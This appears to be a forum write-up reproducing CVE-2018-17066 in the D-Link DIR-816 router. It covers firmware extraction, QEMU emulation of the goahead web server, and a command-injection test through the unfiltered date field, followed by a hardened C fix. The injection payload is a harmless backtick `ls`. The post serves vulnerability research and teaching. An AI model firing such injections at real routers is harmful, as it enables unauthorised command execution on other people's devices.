Overview of CVE-2018-17066: the router's web front end has a time-setting page, but the time value the user types in is never filtered. It is sent straight to the back end, and after a chain of function calls the parameter is placed into a system() command, which gives command injection (arbitrary command execution)!
```c
doSystem("date -s \"%s\"", Var);
```

The parameter passed in goes straight into system() as part of the command string, which is what makes the command injection possible!

## 1. D-Link firmware extraction
`U-Boot: OS Kernel Image("Linux Kernel Image")[Linux,MIPS,lzma]`

```
~/Pwn_CVE/CVE-2018-17066$ binwalk -Me DIR-816.img

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
4280396       0x41504C        Linux kernel version 2.6.36
4280496       0x4150B0        CRC32 polynomial table, little endian
4327552       0x420880        CRC32 polynomial table, little endian
4348800       0x425B80        SHA256 hash constants, little endian
4350160       0x4260D0        AES Inverse S-Box
4350928       0x4263D0        AES S-Box
4642928       0x46D870        xz compressed data
4675640       0x475838        Unix path: /var/run/goahead.pid
4764032       0x48B180        Unix path: /etc/Wireless/RT2860AP/RT2860AP.dat
4789596       0x49155C        XML document, version: "1.0"
4819148       0x4988CC        HTML document header
4819285       0x498955        HTML document footer
4839035       0x49D67B        Neighborly text, "neighbor %.2x%.2x.%pM lostd_delay_timer"
5018336       0x4C92E0        CRC32 polynomial table, little endian
5021872       0x4CA0B0        AES S-Box
```
## 2. Emulating the D-Link router

```
brinmon@brinmon-virtual-machine:~/Pwn_CVE/CVE-2018-17066/_DIR-816.img.extracted/squashfs-root$ file ./bin/goahead
./bin/goahead: ELF 32-bit LSB executable, MIPS, MIPS-II version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped
```
1. **Dynamic version (`qemu-mipsel`)**: suited to a host that already has all the required shared libraries; it saves disk space.
   Note: the root directory is set with `-L`.

```shell
sudo qemu-mipsel -L ./ ./bin/goahead
```

2. **Static version (`qemu-mipsel-static`)**: because it does not depend on external libraries it is easier to distribute and to run in all kinds of environments.
   Note: `chroot .` sets the root directory.

```shell
cp $(which qemu-mipsel-static) ./
sudo chroot . ./qemu-mipsel-static ./bin/goahead
```

Note: delete and recreate the folder, then create the pid file goahead expects:

```shell
rm -rf ./var/run
mkdir ./var/run
touch ./var/run/goahead.pid
```
```asm
li      $s3, dword_480000          # base address of string table 1
li      $s2, aEttimeoutDocum       # base address of string table 2
...
loc_45C72C:                        # CODE XREF: setDefault+98↓j
la      $t9, fopen                 # load the address of the function to call, fopen
addiu   $a0, $s3, -0x3124          # locate the string "/var/run/nvramd.pid"
jalr    $t9 ; fopen                # call fopen
addiu   $a1, $s2, 0x4CDC           # from the offset, address 474CDC holds the single letter "r" (the open mode)
```

```shell
touch ./var/run/nvramd.pid
```
Background:

In Linux, hardware devices are also treated as files; /dev/nvram is the non-volatile RAM (NVRAM) device (the concept is covered in detail in section 5.3.2). `/dev/nvram` offers a convenient way to access and manage the system's non-volatile storage, which holds important data such as system configuration, boot parameters and hardware settings, and is where other hardware stores its information.
```c
// Mount point of the base NVRAM implementation.
#define MOUNT_POINT "/mnt/libnvram/"
// Location of NVRAM override values that are copied into the base NVRAM implementation.
#define OVERRIDE_POINT "/mnt/libnvram.override/"
```

```c
ENTRY("lan_ipaddr", nvram_set, "192.168.126.130") \
ENTRY("lan_bipaddr", nvram_set, "192.168.126.255") \
```

```shell
mipsel-linux-gnu-gcc -c -O2 -fPIC -Wall nvram.c -o nvram.o
mipsel-linux-gnu-gcc -shared -nostdlib nvram.o -o libnvram.so
```
```
┌──(root㉿kali)-[/home/…/Pwn_CVE/CVE-2018-17066/_DIR-816A2_FWv1.10CNB05_R1B011D88210.img.extracted/squashfs-root]
└─# chroot . ./qemu-mipsel-static -E LD_PRELOAD="./libnvram.so" ./bin/goahead
```

```
┌──(root㉿kali)-[/home/…/Pwn_CVE/CVE-2018-17066/_DIR-816A2_FWv1.10CNB05_R1B011D88210.img.extracted/squashfs-root]
└─# chroot . ./qemu-mipsel-static -g 23946 ./bin/goahead
```

The login page is then reachable at:

http://192.168.126.131/dir_login.asp/
## 3. Finding the vulnerable page

`/home/kali/Pwn_CVE/CVE-2018-17066/_DIR-816A2_FWv1.10CNB05_R1B011D88210.img.extracted/squashfs-root/etc_ro/web/dir_login.asp`
```javascript
function onlogin() {
    /*
    if (document.test.show_username.value.length <= 0) {
        alert("请输入用户名!");
        document.test.show_username.focus();
        return false;
    }
    if (document.test.show_username.value != "")
    {
        document.test.username.value = Base64.Encode(document.test.show_username.value);
    }
    if ( document.test.password.value != "")
    {
        document.test.password.value = Base64.Encode(document.test.password.value);
    }
    document.test.show_username.disabled = true;
    */
    return true;
}
```
## 4. Login check bypassed

http://192.168.126.131/d_wizard_step1_start.asp

Value entered into the date field:

```
ls
```

Written into the date field, the command injection succeeds!

## 5. Final summary and analysis
Command substitution can be written either in backtick (``) form or in $() form; the $() form is generally preferred because it is more readable and supports nesting.

```
┌──(kali㉿kali)-[~/tools/BurpSuite V2024.3.1.2]
└─$ date -s "`ls`2024-6-05 01:58:39"
date: 无效的日期 "清除许可证和数据.bat\n使用说明.txt\nBurpSuite\nCNBurp(无CMD窗口).VBS\nCN-JRE Burp.bat\nENBurp(无CMD窗口).VBS\nEN-JRE Burp.bat\njre\nLinux\nStart.bat\nStart.VBS2024-6-05 01:58:39"

┌──(kali㉿kali)-[~/tools/BurpSuite V2024.3.1.2]
└─$ "`ls`"
清除许可证和数据.bat
使用说明.txt
BurpSuite
CNBurp(无CMD窗口).VBS
CN-JRE Burp.bat
ENBurp(无CMD窗口).VBS
EN-JRE Burp.bat
jre
Linux
Start.bat
Start.VBS:未找到命令
```
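As an added illustration (not code from the firmware or from this write-up), the vulnerable pattern the post describes next to a hardened version: allow-list the time string and hand it to date through execv instead of a shell. The function names and the /bin/date path are assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Pattern from the write-up (reconstructed, not the firmware's code): the user
 * supplied time string is formatted into a shell command and run via system().
 * Anything the shell expands inside the double quotes (`...`, $(...)) executes. */
int vulnerable_set_date(const char *var) {
    char cmd[256];
    snprintf(cmd, sizeof cmd, "date -s \"%s\"", var);
    return system(cmd);
}

/* Hardening step 1: allow-list validation. Only the characters a
 * "YYYY-M-D HH:MM:SS" value needs are accepted, so shell metacharacters
 * such as ` $ ( ) ; | & never reach the command. Returns 1 if acceptable. */
int is_safe_date_string(const char *s) {
    size_t n = strlen(s);
    if (n < 8 || n > 19) return 0;   /* from "2024-6-5" up to "2024-06-05 01:58:39" */
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isdigit(c) || c == '-' || c == ':' || c == ' ')) return 0;
    }
    return 1;
}

/* Hardening step 2: no shell at all. The validated value is passed to
 * /bin/date as a single argv element through fork/execv, so it can never be
 * parsed as shell syntax. Returns date's exit status, or -1 on rejection/error. */
int hardened_set_date(const char *var) {
    if (!is_safe_date_string(var)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *argv[] = { "/bin/date", "-s", (char *)var, NULL };
        execv(argv[0], argv);
        _exit(127);   /* only reached if execv itself failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The validator rejects the post's `` `ls`2024-6-05 01:58:39 `` payload before anything is executed, and even an accepted value reaches date as one argument rather than shell text.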
```c
doSystem("date -s \"%s\"", Var);
```

The parameter passed in goes straight into system() as part of the command string, which is what makes the command injection possible!

Reproduction notes consulted:

1. CVE-2018-17066 reproduction | 1uckyc's blog: https://1uckyc.github.io/2023/11/24/cve-2018-17066%E5%A4%8D%E7%8E%B0/
2. DIR-816 emulation and command-injection vulnerability analysis - IOTsec-Zone: https://www.iotsec-zone.com/article/213
3. VulInfo/D-Link/DIR-816/cmd_injection_0/README.md at master · PAGalaxyLab/VulInfo (github.com): https://github.com/PAGalaxyLab/VulInfo/blob/master/D-Link/DIR-816/cmd_injection_0/README.md
4. Introduction and practice of IoT terminal security: playing with IoT firmware (part 2) - SecPulse.COM: https://www.secpulse.com/archives/188250.html
5. Debugging D-Link: Emulating firmware and hacking hardware (greynoise.io)
Kanxue ID: Loserme
https://bbs.kanxue.com/user-home-970470.htm